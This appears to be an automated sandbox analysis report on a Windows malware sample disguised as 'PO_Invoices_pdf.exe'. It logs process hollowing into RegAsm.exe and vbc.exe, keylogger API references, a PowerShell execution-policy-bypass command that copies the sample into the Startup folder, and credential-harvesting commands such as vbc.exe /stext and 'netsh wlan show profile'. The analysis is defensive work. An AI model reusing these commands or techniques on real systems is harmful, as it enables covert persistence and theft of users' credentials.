Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile Volume queried: C:\ FullSizeInformation
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpBinary or memory string: Al:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                            Source: Matiexgoods.exe, 00000008.00000002.705756685.00000000044E1000.00000004.00000001.sdmpBinary or memory string: 1keA/sO5FDZFCBsE6iqEMuCQifoK6oH1s/UW1veY/gDcXrGORBZz4Z+noIDCwQ57PciD
                            Source: hawkgoods.exe, 00000006.00000002.397387574.00000000068E0000.00000002.00000001.sdmp, origigoods40.exe, 00000007.00000002.479272063.00000000060C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                            Source: hawkgoods.exe, 00000006.00000002.397387574.00000000068E0000.00000002.00000001.sdmp, origigoods40.exe, 00000007.00000002.479272063.00000000060C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                            Source: hawkgoods.exe, 00000006.00000002.397387574.00000000068E0000.00000002.00000001.sdmp, origigoods40.exe, 00000007.00000002.479272063.00000000060C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                            Source: Matiexgoods.exe, 00000008.00000002.694705884.0000000001823000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: hawkgoods.exe, 00000006.00000002.397387574.00000000068E0000.00000002.00000001.sdmp, origigoods40.exe, 00000007.00000002.479272063.00000000060C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B377F0 LdrInitializeThunk,
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeMemory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions
Source: hawkgoods.exe.5.dr, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: hawkgoods.exe.5.dr, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: origigoods40.exe.5.dr, A/b2.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 6.0.hawkgoods.exe.2f0000.0.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 6.2.hawkgoods.exe.2f0000.0.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
Source: 7.0.origigoods40.exe.c30000.0.unpack, A/b2.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
Source: 7.2.origigoods40.exe.c30000.0.unpack, A/b2.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Bypasses PowerShell execution policy
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 403000
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D12008
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 403000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 88D008
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2164
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2092
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Process created: unknown unknown
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Users\user\Desktop\PO_Invoices_pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
